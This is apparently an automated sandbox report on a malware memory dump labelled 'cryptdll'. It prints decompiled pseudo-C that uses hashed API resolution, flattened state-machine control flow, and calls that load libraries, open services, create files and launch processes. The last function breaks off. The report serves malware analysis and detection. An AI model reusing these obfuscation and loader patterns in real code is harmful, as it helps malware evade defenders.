                                                        0x00629042
                                                        0x00629049
                                                        0x00628f35
                                                        0x00628f35
                                                        0x00000000
                                                        0x00628f35
                                                        0x00628ec3
                                                        0x00628ec8
                                                        0x00000000
                                                        0x00628ece
                                                        0x00628ece
                                                        0x00628ed5
                                                        0x00628ee8
                                                        0x00628eed
                                                        0x00628eed
                                                        0x00628ef3
                                                        0x00628ef5
                                                        0x00000000
                                                        0x00628ef5
                                                        0x00628ec8
                                                        0x00628ec1
                                                        0x00628eb6
                                                        0x00000000
                                                        0x00628fbb
                                                        0x00628fbb
                                                        0x00628fcd
                                                        0x00000000

                                                        APIs
                                                        • OpenServiceW.ADVAPI32(3251FEFE,?,00010000,?,3251FEFE,?,186D334D,008DDFF8,00628782,?,3251FEFE,?), ref: 00628FF9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2292162710.0000000000621000.00000020.00000001.sdmp, Offset: 00620000, based on PE: true
                                                        • Associated: 0000000E.00000002.2292147578.0000000000620000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000E.00000002.2292182201.000000000062D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000E.00000002.2292198739.000000000062F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_620000_cryptdll.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: OpenService
                                                        • String ID: uw(#$uw(#
                                                        • API String ID: 3098006287-1105621689
                                                        • Opcode ID: 4a186af2895525cc00e8a3a7a66c60d801a04ec65280a5838b6af51fd48bb3fb
                                                        • Instruction ID: a4f3ebe0bf1903b1486b6a5c2e7076c2cedb39bc99951b22127aa1a1562b1c0b
                                                        • Opcode Fuzzy Hash: 4a186af2895525cc00e8a3a7a66c60d801a04ec65280a5838b6af51fd48bb3fb
                                                        • Instruction Fuzzy Hash: 3B41D421B06A358FDB20A6BCBC8077A2397A794790F110839F986CB741EF25CC454FA6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 283 627120 284 627125-62712a 283->284 285 627130 284->285 286 6271b4-6271b9 284->286 287 627233-627248 call 6234c0 285->287 288 627136-62713b 285->288 289 627207-62720c 286->289 290 6271bb 286->290 311 627265-627278 LoadLibraryW 287->311 312 62724a-627260 call 623f00 call 623e60 287->312 293 627190-627195 288->293 294 62713d 288->294 291 627227-62722c 289->291 292 62720e-627222 call 627080 289->292 296 6271ee-627202 call 627080 290->296 297 6271bd-6271c2 290->297 291->284 300 627232 291->300 292->284 293->291 299 62719b-6271af call 627080 293->299 301 62717a-62718e call 627080 294->301 302 62713f-627144 294->302 296->284 304 6271c4-6271c9 297->304 305 6271d5-6271e9 call 627080 297->305 299->284 301->284 309 627146-62714b 302->309 310 627164-627178 call 627080 302->310 304->291 313 6271cb-6271d0 304->313 305->284 309->291 318 627151-627162 call 627080 309->318 310->284 322 627295-6272a0 311->322 323 62727a-627290 call 623f00 call 623e60 311->323 312->311 313->284 318->284 334 6272a2-6272b8 call 623f00 call 623e60 322->334 335 6272bd-6272c5 322->335 323->322 334->335
                                                        C-Code - Quality: 85%
                                                        			E00627120(void* __ebx) {
                                                        				void* _t2;
                                                        				struct HINSTANCE__* _t8;
                                                        				intOrPtr* _t9;
                                                        				intOrPtr* _t11;
                                                        				void* _t21;
                                                        				intOrPtr _t23;
                                                        				void* _t48;
                                                        				WCHAR* _t51;
                                                        				void* _t53;
                                                        				void* _t54;
                                                        				void* _t55;
                                                        
                                                        				_t21 = __ebx;
                                                        				_t2 = 0x291da748;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t54 = _t2 - 0x1a8031ec;
                                                        						if(_t54 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t54 == 0) {
                                                        							_t51 = E006234C0(0x62d830);
                                                        							__eflags =  *0x62dd1c;
                                                        							if( *0x62dd1c == 0) {
                                                        								 *0x62dd1c = E00623E60(_t21, E00623F00(0x9bab0b12), 0xe4b28d97, _t53);
                                                        							}
                                                        							_t8 = LoadLibraryW(_t51);
                                                        							_t23 =  *0x62e548; // 0x917e10
                                                        							 *(_t23 + 0x4c) = _t8;
                                                        							_t9 =  *0x62e494;
                                                        							__eflags = _t9;
                                                        							if(_t9 == 0) {
                                                        								_t9 = E00623E60(_t21, E00623F00(0x9bab0b12), 0x7facde30, _t53);
                                                        								 *0x62e494 = _t9;
                                                        							}
                                                        							_t48 =  *_t9();
                                                        							_t11 =  *0x62df30;
                                                        							__eflags = _t11;
                                                        							if(_t11 == 0) {
                                                        								_t11 = E00623E60(_t21, E00623F00(0x9bab0b12), 0x5010a54d, _t53);
                                                        								 *0x62df30 = _t11;
                                                        							}
                                                        							return  *_t11(_t48, 0, _t51);
                                                        						} else {
                                                        							_t55 = _t2 - 0x185e9846;
                                                        							if(_t55 > 0) {
                                                        								__eflags = _t2 - 0x18843476;
                                                        								if(__eflags != 0) {
                                                        									goto L21;
                                                        								} else {
                                                        									E00627080(_t21, 0x62d7a0, 4, __eflags);
                                                        									_t2 = 0x2eb73d4f;
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								if(_t55 == 0) {
                                                        									E00627080(_t21, 0x62d8f0, 2, __eflags);
                                                        									_t2 = 0x9da2520;
                                                        									continue;
                                                        								} else {
                                                        									if(_t2 == 0x9da2520) {
                                                        										E00627080(_t21, 0x62d800, 3, __eflags);
                                                        										_t2 = 0x18843476;
                                                        										continue;
                                                        									} else {
                                                        										_t57 = _t2 - 0x15a7f569;
                                                        										if(_t2 != 0x15a7f569) {
                                                        											goto L21;
                                                        										} else {
                                                        											E00627080(_t21, 0x62d860, 0, _t57);
                                                        											_t2 = 0x39797244;
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L30:
                                                        					}
                                                        					__eflags = _t2 - 0x2eb73d4f;
                                                        					if(__eflags > 0) {
                                                        						__eflags = _t2 - 0x39797244;
                                                        						if(__eflags != 0) {
                                                        							goto L21;
                                                        						} else {
                                                        							E00627080(_t21, 0x62d890, 1, __eflags);
                                                        							_t2 = 0x185e9846;
                                                        							goto L1;
                                                        						}
                                                        					} else {
                                                        						if(__eflags == 0) {
                                                        							E00627080(_t21, 0x62d7e0, 5, __eflags);
                                                        							_t2 = 0x22a44863;
                                                        							goto L1;
                                                        						} else {
                                                        							__eflags = _t2 - 0x22a44863;
                                                        							if(__eflags == 0) {
                                                        								E00627080(_t21, 0x62d8c0, 6, __eflags);
                                                        								_t2 = 0x1a8031ec;
                                                        								goto L1;
                                                        							} else {
                                                        								__eflags = _t2 - 0x291da748;
                                                        								if(__eflags != 0) {
                                                        									goto L21;
                                                        								} else {
                                                        									_t2 = 0x15a7f569;
                                                        									goto L1;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L30;
                                                        					L21:
                                                        					__eflags = _t2 - 0x21acdd7e;
                                                        				} while (__eflags != 0);
                                                        				return _t2;
                                                        				goto L30;
                                                        			}














                                                        0x00627120
                                                        0x00627120
                                                        0x00627120
                                                        0x00627125
                                                        0x00627125
                                                        0x00627125
                                                        0x00627125
                                                        0x0062712a
                                                        0x00000000
                                                        0x00000000
                                                        0x00627130
                                                        0x0062723f
                                                        0x00627246
                                                        0x00627248
                                                        0x00627260
                                                        0x00627260
                                                        0x00627266
                                                        0x00627268
                                                        0x0062726e
                                                        0x00627271
                                                        0x00627276
                                                        0x00627278
                                                        0x0062728b
                                                        0x00627290
                                                        0x00627290
                                                        0x00627297
                                                        0x00627299
                                                        0x0062729e
                                                        0x006272a0
                                                        0x006272b3
                                                        0x006272b8
                                                        0x006272b8
                                                        0x006272c5
                                                        0x00627136
                                                        0x00627136
                                                        0x0062713b
                                                        0x00627190
                                                        0x00627195
                                                        0x00000000
                                                        0x0062719b
                                                        0x006271a5
                                                        0x006271aa
                                                        0x00000000
                                                        0x006271aa
                                                        0x0062713d
                                                        0x0062713d
                                                        0x00627184
                                                        0x00627189
                                                        0x00000000
                                                        0x0062713f
                                                        0x00627144
                                                        0x0062716e
                                                        0x00627173
                                                        0x00000000
                                                        0x00627146
                                                        0x00627146
                                                        0x0062714b
                                                        0x00000000
                                                        0x00627151
                                                        0x00627158
                                                        0x0062715d
                                                        0x00000000
                                                        0x0062715d
                                                        0x0062714b
                                                        0x00627144
                                                        0x0062713d
                                                        0x0062713b
                                                        0x00000000
                                                        0x00627130
                                                        0x006271b4
                                                        0x006271b9
                                                        0x00627207
                                                        0x0062720c
                                                        0x00000000
                                                        0x0062720e
                                                        0x00627218
                                                        0x0062721d
                                                        0x00000000
                                                        0x0062721d
                                                        0x006271bb
                                                        0x006271bb
                                                        0x006271f8
                                                        0x006271fd
                                                        0x00000000
                                                        0x006271bd
                                                        0x006271bd
                                                        0x006271c2
                                                        0x006271df
                                                        0x006271e4
                                                        0x00000000
                                                        0x006271c4
                                                        0x006271c4
                                                        0x006271c9
                                                        0x00000000
                                                        0x006271cb
                                                        0x006271cb
                                                        0x00000000
                                                        0x006271cb
                                                        0x006271c9
                                                        0x006271c2
                                                        0x006271bb
                                                        0x00000000
                                                        0x00627227
                                                        0x00627227
                                                        0x00627227
                                                        0x00627232
                                                        0x00000000

                                                        APIs
                                                        • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,006268AC), ref: 00627266
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2292162710.0000000000621000.00000020.00000001.sdmp, Offset: 00620000, based on PE: true
                                                        • Associated: 0000000E.00000002.2292147578.0000000000620000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000E.00000002.2292182201.000000000062D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000E.00000002.2292198739.000000000062F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_620000_cryptdll.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: Dry9$Dry9
                                                        • API String ID: 1029625771-121480178
                                                        • Opcode ID: ebf775f5a5b818e5401c3d08e25a96a7552325be677a6e46776b3a6fe6c71490
                                                        • Instruction ID: 5eaf06b23629aacd30c0942eb21f5316e9592b8cf80647040079c76ce587156f
                                                        • Opcode Fuzzy Hash: ebf775f5a5b818e5401c3d08e25a96a7552325be677a6e46776b3a6fe6c71490
                                                        • Instruction Fuzzy Hash: A931F920B0DD3083DB646A7978A5FAE14A7DFA1340F34442AF151CBB95DD2ACE124F86
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 343 624b70-624b80 344 624b82-624b98 call 623f00 call 623e60 343->344 345 624b9d-624bba 343->345 344->345 350 624bd7-624bf5 CreateProcessW 345->350 351 624bbc-624bd2 call 623f00 call 623e60 345->351 352 624c73-624c7a 350->352 353 624bf7-624bfd 350->353 351->350 356 624c14-624c1b 353->356 357 624bff-624c13 353->357 359 624c38-624c45 356->359 360 624c1d-624c33 call 623f00 call 623e60 356->360 367 624c62-624c72 359->367 368 624c47-624c5d call 623f00 call 623e60 359->368 360->359 368->367
                                                        C-Code - Quality: 60%
                                                        			E00624B70(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __ebp, int _a4, intOrPtr _a12) {
                                                        				struct _STARTUPINFOW _v72;
                                                        				struct _PROCESS_INFORMATION _v88;
                                                        				intOrPtr* _t9;
                                                        				int _t12;
                                                        				intOrPtr* _t15;
                                                        				intOrPtr* _t17;
                                                        				WCHAR* _t44;
                                                        				WCHAR* _t45;
                                                        
                                                        				_t46 = __ebp;
                                                        				_t26 = __ebx;
                                                        				_t9 =  *0x62ddc0;
                                                        				_t45 = __edx;
                                                        				_t44 = __ecx;
                                                        				if(_t9 == 0) {
                                                        					_t9 = E00623E60(__ebx, E00623F00(0xc6fbcd74), 0x7e0ae558, __ebp);
                                                        					 *0x62ddc0 = _t9;
                                                        				}
                                                        				 *_t9( &_v72, 0, 0x44);
                                                        				_v72.cb = 0x44;
                                                        				if( *0x62e21c == 0) {
                                                        					 *0x62e21c = E00623E60(_t26, E00623F00(0x9bab0b12), 0xbd6cc871, _t46);
                                                        				}
                                                        				_t12 = CreateProcessW(_t44, _t45, 0, 0, _a4, 0, 0, 0,  &_v72,  &_v88); // executed
                                                        				if(_t12 == 0) {
                                                        					return 0;
                                                        				} else {
                                                        					if(_a12 == 0) {
                                                        						_t15 =  *0x62de3c;
                                                        						if(_t15 == 0) {
                                                        							_t15 = E00623E60(_t26, E00623F00(0x9bab0b12), 0x20de7595, _t46);
                                                        							 *0x62de3c = _t15;
                                                        						}
                                                        						 *_t15(_v88.hProcess);
                                                        						_t17 =  *0x62de3c;
                                                        						if(_t17 == 0) {
                                                        							_t17 = E00623E60(_t26, E00623F00(0x9bab0b12), 0x20de7595, _t46);
                                                        							 *0x62de3c = _t17;
                                                        						}
                                                        						 *_t17(_v88.hProcess);
                                                        						return 1;
                                                        					} else {
                                                        						asm("movdqu xmm0, [esp+0x8]");
                                                        						asm("movdqu [eax], xmm0");
                                                        						return 1;
                                                        					}
                                                        				}
                                                        			}











                                                        0x00624b70
                                                        0x00624b70
                                                        0x00624b70
                                                        0x00624b79
                                                        0x00624b7c
                                                        0x00624b80
                                                        0x00624b93
                                                        0x00624b98
                                                        0x00624b98
                                                        0x00624ba6
                                                        0x00624bb0
                                                        0x00624bba
                                                        0x00624bd2
                                                        0x00624bd2
                                                        0x00624bf1
                                                        0x00624bf5
                                                        0x00624c7a
                                                        0x00624bf7
                                                        0x00624bfd
                                                        0x00624c14
                                                        0x00624c1b
                                                        0x00624c2e
                                                        0x00624c33
                                                        0x00624c33
                                                        0x00624c3c
                                                        0x00624c3e
                                                        0x00624c45
                                                        0x00624c58
                                                        0x00624c5d
                                                        0x00624c5d
                                                        0x00624c66
                                                        0x00624c72
                                                        0x00624bff
                                                        0x00624bff
                                                        0x00624c05
                                                        0x00624c13
                                                        0x00624c13
                                                        0x00624bfd

                                                        APIs
                                                        • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 00624BF1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2292162710.0000000000621000.00000020.00000001.sdmp, Offset: 00620000, based on PE: true
                                                        • Associated: 0000000E.00000002.2292147578.0000000000620000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000E.00000002.2292182201.000000000062D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000E.00000002.2292198739.000000000062F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_620000_cryptdll.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID: D$X~
                                                        • API String ID: 963392458-2090554203
                                                        • Opcode ID: 50bbb215f3f2be7ed681d3ceefdde3bea4da4abdc0d77b02db15b5c6459ab60c
                                                        • Instruction ID: 0f4be0d0cce82070b6c9ef3e97ea39f043dc1b5f67737360f0e02e229e0fc113
                                                        • Opcode Fuzzy Hash: 50bbb215f3f2be7ed681d3ceefdde3bea4da4abdc0d77b02db15b5c6459ab60c
                                                        • Instruction Fuzzy Hash: 3C218030704A225BEB24AB7EEC41BBB37A7ABD0704F10442DB694CA3A0EE75D9059F55
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 457 6230a0-6230b6 458 6230ba-6230bf 457->458 459 6230c0-6230c5 458->459 460 623201-623206 459->460 461 6230cb 459->461 464 623245-62324c 460->464 465 623208-62320d 460->465 462 6230d1-6230d6 461->462 463 6231ed-6231f1 461->463 468 6231da-6231e8 462->468 469 6230dc-6230e1 462->469 466 6232f6-623300 463->466 467 6231f7-6231fc 463->467 472 623269-623274 464->472 473 62324e-623264 call 623f00 call 623e60 464->473 470 623213-623218 465->470 471 6232ab-6232b3 465->471 467->459 468->459 474 6231a0-6231a8 469->474 475 6230e7-6230ec 469->475 476 62321a-623228 call 623d00 470->476 477 62322d-623232 470->477 478 6232d3-6232f3 471->478 479 6232b5-6232cd call 623f00 call 623e60 471->479 490 623291-62329f RtlAllocateHeap 472->490 491 623276-62328c call 623f00 call 623e60 472->491 473->472 484 6231aa-6231c2 call 623f00 call 623e60 474->484 485 6231c8-6231d5 474->485 475->477 482 6230f2-62319b 475->482 476->458 477->459 486 623238-623242 477->486 478->466 479->478 482->458 484->485 485->458 490->466 498 6232a1-6232a6 490->498 491->490 498->458
                                                        C-Code - Quality: 71%
                                                        			E006230A0() {
                                                        				void* __ebx;
                                                        				void* __ecx;
                                                        				void* __ebp;
                                                        				void* _t61;
                                                        				intOrPtr* _t62;
                                                        				void* _t65;
                                                        				intOrPtr _t93;
                                                        				intOrPtr* _t95;
                                                        				intOrPtr _t107;
                                                        				intOrPtr* _t116;
                                                        				void* _t127;
                                                        				void* _t128;
                                                        				intOrPtr _t129;
                                                        				signed int _t134;
                                                        				void* _t135;
                                                        				void* _t136;
                                                        
                                                        				_t93 =  *((intOrPtr*)(_t135 + 0xc));
                                                        				_t61 = 0x11f367c2;
                                                        				_t134 =  *(_t135 + 0x10);
                                                        				_t129 =  *((intOrPtr*)(_t135 + 0x14));
                                                        				_t127 =  *(_t135 + 0x18);
                                                        				while(1) {
                                                        					L1:
                                                        					do {
                                                        						while(1) {
                                                        							L2:
                                                        							_t136 = _t61 - 0x12466c01;
                                                        							if(_t136 > 0) {
                                                        								break;
                                                        							}
                                                        							if(_t136 == 0) {
                                                        								if(_t93 !=  *(_t135 + 0x18)) {
                                                        									L29:
                                                        									return 1;
                                                        								} else {
                                                        									_t61 = 0x2f21cdd2;
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								if(_t61 == 0x7a26146) {
                                                        									_t61 =  ==  ? 0x2f21cdd2 : 0x12466c01;
                                                        									continue;
                                                        								} else {
                                                        									if(_t61 == 0x8928514) {
                                                        										_t95 =  *0x62e1cc;
                                                        										if(_t95 == 0) {
                                                        											_t95 = E00623E60(_t93, E00623F00(0x55ab7d30), 0x815a9da3, _t134);
                                                        											 *0x62e1cc = _t95;
                                                        										}
                                                        										_t129 =  *_t95(_t134 + 0x2c);
                                                        										_t61 = 0x39d78901;
                                                        										while(1) {
                                                        											L1:
                                                        											goto L2;
                                                        										}
                                                        									} else {
                                                        										if(_t61 != 0x11f367c2) {
                                                        											goto L18;
                                                        										} else {
                                                        											 *(_t135 + 0x18) = 0x2e7c;
                                                        											 *(_t135 + 0x18) = 0x3e0f83e1 *  *(_t135 + 0x18) >> 0x20 >> 4;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 7;
                                                        											 *(_t135 + 0x18) = 0x2f149903 *  *(_t135 + 0x18) >> 0x20 >> 4;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) + 0xffff1475;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) * 0x15;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 2;
                                                        											 *(_t135 + 0x18) = 0x22b63cbf *  *(_t135 + 0x18) >> 0x20 >> 4;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) ^ 0x8ee7705c;
                                                        											 *(_t135 + 0x10) = 0xa461;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) << 0xe;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) * 8 -  *(_t135 + 0x10) << 2;
                                                        											_t61 = 0x8928514;
                                                        											 *(_t135 + 0x10) = 0x51eb851f *  *(_t135 + 0x10) >> 0x20 >> 3;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) + 0xffffb6ab;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) ^ 0x88f30986;
                                                        											while(1) {
                                                        												L1:
                                                        												goto L2;
                                                        											}
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        							L30:
                                                        						}
                                                        						if(_t61 == 0x2f21cdd2) {
                                                        							_t62 =  *0x62e494;
                                                        							if(_t62 == 0) {
                                                        								_t62 = E00623E60(_t93, E00623F00(0x9bab0b12), 0x7facde30, _t134);
                                                        								 *0x62e494 = _t62;
                                                        							}
                                                        							_t128 =  *_t62();
                                                        							if( *0x62dd18 == 0) {
                                                        								 *0x62dd18 = E00623E60(_t93, E00623F00(0x9bab0b12), 0x9ff0609c, _t134);
                                                        							}
                                                        							_t65 = RtlAllocateHeap(_t128, 8, 0x24c); // executed
                                                        							_t127 = _t65;
                                                        							if(_t127 == 0) {
                                                        								goto L29;
                                                        							} else {
                                                        								_t61 = 0x35eaa088;
                                                        								goto L1;
                                                        							}
                                                        						} else {
                                                        							if(_t61 == 0x35eaa088) {
                                                        								_t116 =  *0x62e43c;
                                                        								if(_t116 == 0) {
                                                        									_t116 = E00623E60(_t93, E00623F00(0x9bab0b12), 0x2df4d385, _t134);
                                                        									 *0x62e43c = _t116;
                                                        								}
                                                        								 *_t116(_t127 + 0x3c, _t134 + 0x2c, (_t129 - _t134 - 0x2c >> 1) + 1);
                                                        								_t107 =  *((intOrPtr*)(_t135 + 0x1c));
                                                        								 *(_t127 + 0x2c) =  *(_t107 + 0x1c);
                                                        								 *((intOrPtr*)(_t107 + 0xc)) =  *((intOrPtr*)(_t107 + 0xc)) + 1;
                                                        								 *(_t107 + 0x1c) = _t127;
                                                        								goto L29;
                                                        							} else {
                                                        								if(_t61 != 0x39d78901) {
                                                        									goto L18;
                                                        								} else {
                                                        									_t93 = E00623D00(_t129);
                                                        									_t61 = 0x7a26146;
                                                        									while(1) {
                                                        										L1:
                                                        										goto L2;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						goto L30;
                                                        						L18:
                                                        					} while (_t61 != 0x100ad7b4);
                                                        					return 1;
                                                        					goto L30;
                                                        				}
                                                        			}



















                                                        0x006230a2
                                                        0x006230a6
                                                        0x006230ac
                                                        0x006230b1
                                                        0x006230b6
                                                        0x006230ba
                                                        0x006230ba
                                                        0x006230c0
                                                        0x006230c0
                                                        0x006230c0
                                                        0x006230c0
                                                        0x006230c5
                                                        0x00000000
                                                        0x00000000
                                                        0x006230cb
                                                        0x006231f1
                                                        0x006232f9
                                                        0x00623300
                                                        0x006231f7
                                                        0x006231f7
                                                        0x00000000
                                                        0x006231f7
                                                        0x006230d1
                                                        0x006230d6
                                                        0x006231e5
                                                        0x00000000
                                                        0x006230dc
                                                        0x006230e1
                                                        0x006231a0
                                                        0x006231a8
                                                        0x006231c0
                                                        0x006231c2
                                                        0x006231c2
                                                        0x006231ce
                                                        0x006231d0
                                                        0x006230ba
                                                        0x006230ba
                                                        0x00000000
                                                        0x006230ba
                                                        0x006230e7
                                                        0x006230ec
                                                        0x00000000
                                                        0x006230f2
                                                        0x006230f2
                                                        0x0062310d
                                                        0x00623111
                                                        0x0062311f
                                                        0x00623123
                                                        0x00623130
                                                        0x00623139
                                                        0x00623147
                                                        0x0062314b
                                                        0x00623153
                                                        0x0062315b
                                                        0x00623175
                                                        0x0062317f
                                                        0x00623187
                                                        0x0062318b
                                                        0x00623193
                                                        0x006230ba
                                                        0x006230ba
                                                        0x00000000
                                                        0x006230ba
                                                        0x006230ba
                                                        0x006230ec
                                                        0x006230e1
                                                        0x006230d6
                                                        0x00000000
                                                        0x006230cb
                                                        0x00623206
                                                        0x00623245
                                                        0x0062324c
                                                        0x0062325f
                                                        0x00623264
                                                        0x00623264
                                                        0x0062326b
                                                        0x00623274
                                                        0x0062328c
                                                        0x0062328c
                                                        0x00623299
                                                        0x0062329b
                                                        0x0062329f
                                                        0x00000000
                                                        0x006232a1
                                                        0x006232a1
                                                        0x00000000
                                                        0x006232a1
                                                        0x00623208
                                                        0x0062320d
                                                        0x006232ab
                                                        0x006232b3
                                                        0x006232cb
                                                        0x006232cd
                                                        0x006232cd
                                                        0x006232e4
                                                        0x006232e6
                                                        0x006232ed
                                                        0x006232f0
                                                        0x006232f3
                                                        0x00000000
                                                        0x00623213
                                                        0x00623218
                                                        0x00000000
                                                        0x0062321a
                                                        0x00623221
                                                        0x00623223
                                                        0x006230ba
                                                        0x006230ba
                                                        0x00000000
                                                        0x006230ba
                                                        0x006230ba
                                                        0x00623218
                                                        0x0062320d
                                                        0x00000000
                                                        0x0062322d
                                                        0x0062322d
                                                        0x00623242
                                                        0x00000000
                                                        0x00623242

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,00000008,0000024C), ref: 00623299
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2292162710.0000000000621000.00000020.00000001.sdmp, Offset: 00620000, based on PE: true
                                                        • Associated: 0000000E.00000002.2292147578.0000000000620000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000E.00000002.2292182201.000000000062D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000E.00000002.2292198739.000000000062F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_620000_cryptdll.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID: |.
                                                        • API String ID: 1279760036-512043466
                                                        • Opcode ID: 9de0dfccf22a524db15e6474689d4dd4a9ed9c68861150a7ee90f54374bc7d30
                                                        • Instruction ID: c130db92d94f142f7b3cc3e142782cf0e6998dffd4a358ced677559419e35c24
                                                        • Opcode Fuzzy Hash: 9de0dfccf22a524db15e6474689d4dd4a9ed9c68861150a7ee90f54374bc7d30
                                                        • Instruction Fuzzy Hash: 0351B271708B328BC758DF6CA48456ABBE7EBD4300F20482EE451CB351DB35DA4A8F92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 508 6280a0-62815b 509 628163-628168 508->509 510 628170-628175 509->510 511 62817b 510->511 512 628338-62833d 510->512 513 628181-628186 511->513 514 628287-62829b call 6234c0 511->514 515 62836f-628377 512->515 516 62833f-628344 512->516 519 628252-628259 513->519 520 62818c-628191 513->520 534 6282bb-6282e3 514->534 535 62829d-6282b5 call 623f00 call 623e60 514->535 517 628397-6283bb CreateFileW 515->517 518 628379-628391 call 623f00 call 623e60 515->518 521 628346-62834b 516->521 522 628365-62836a 516->522 526 6283ee-6283fa 517->526 527 6283bd-6283c2 517->527 518->517 528 628276-628282 519->528 529 62825b-628271 call 623f00 call 623e60 519->529 530 6281e3-62821a 520->530 531 628193-628198 520->531 532 6283c7-6283ce 521->532 533 62834d-628352 521->533 522->510 527->510 528->510 529->528 541 628237-62824d 530->541 542 62821c-628232 call 623f00 call 623e60 530->542 531->533 540 62819e-6281e1 call 62b6e0 531->540 538 6283d0-6283e6 call 623f00 call 623e60 532->538 539 6283eb-6283ec CloseHandle 532->539 533->510 543 628358-628364 533->543 561 628300-62830b 534->561 562 6282e5-6282fb call 623f00 call 623e60 534->562 535->534 538->539 539->526 540->510 541->510 542->541 571 628328-628333 561->571 572 62830d-628323 call 623f00 call 623e60 561->572 562->561 571->509 572->571
                                                        C-Code - Quality: 71%
                                                        			E006280A0(signed int __edx) {
                                                        				short _v524;
                                                        				struct _SECURITY_ATTRIBUTES* _v532;
                                                        				intOrPtr _v536;
                                                        				intOrPtr _v540;
                                                        				intOrPtr _v544;
                                                        				intOrPtr _v548;
                                                        				intOrPtr _v552;
                                                        				intOrPtr _v556;
                                                        				intOrPtr _v560;
                                                        				char _v564;
                                                        				intOrPtr _v568;
                                                        				char _v572;
                                                        				struct _SECURITY_ATTRIBUTES* _v576;
                                                        				intOrPtr _v580;
                                                        				signed int _v584;
                                                        				signed int _v588;
                                                        				signed int _v592;
                                                        				signed int _v596;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t58;
                                                        				void* _t64;
                                                        				void* _t66;
                                                        				void* _t73;
                                                        				intOrPtr* _t78;
                                                        				intOrPtr* _t80;
                                                        				void* _t82;
                                                        				void* _t83;
                                                        				intOrPtr* _t86;
                                                        				void* _t88;
                                                        				intOrPtr _t89;
                                                        				intOrPtr* _t90;
                                                        				void* _t92;
                                                        				void* _t96;
                                                        				intOrPtr _t101;
                                                        				char _t105;
                                                        				signed int _t122;
                                                        				void* _t125;
                                                        				void* _t127;
                                                        				void* _t128;
                                                        				signed int* _t129;
                                                        				void* _t131;
                                                        
                                                        				_t122 = __edx;
                                                        				_t129 =  &_v596;
                                                        				_v584 = 0x9318;
                                                        				_t58 = 0x343bfd89;
                                                        				_v584 = _v584 ^ 0xde90c338;
                                                        				_v584 = _v584 ^ 0xde905120;
                                                        				_v596 = 0x7d19;
                                                        				_v596 = _v596 << 9;
                                                        				_v596 = _v596 >> 0xe;
                                                        				_v596 = _v596 + 0xffff07e5;
                                                        				_v596 = _v596 | 0x8aea6eef;
                                                        				_v596 = _v596 + 0xd867;
                                                        				_v596 = _v596 + 0x9c41;
                                                        				_v596 = _v596 + 0x3de0;
                                                        				_v596 = _v596 + 0x218b;
                                                        				_v596 = _v596 ^ 0x00014403;
                                                        				_v592 = 0x2591;
                                                        				_t128 = _v584;
                                                        				_t96 = 0;
                                                        				_v592 = _v592 * 0x7d;
                                                        				_v592 = _v592 + 0x8d68;
                                                        				_v592 = _v592 + 0xffff8911;
                                                        				_v592 = _v592 * 0x6a;
                                                        				_v592 = _v592 + 0xffff93d5;
                                                        				_v592 = _v592 ^ 0x07a13cd2;
                                                        				_v588 = 0x789;
                                                        				_v588 = _v588 >> 1;
                                                        				_v588 = _v588 ^ 0xaee58af2;
                                                        				_v588 = _v588 ^ 0xaee58936;
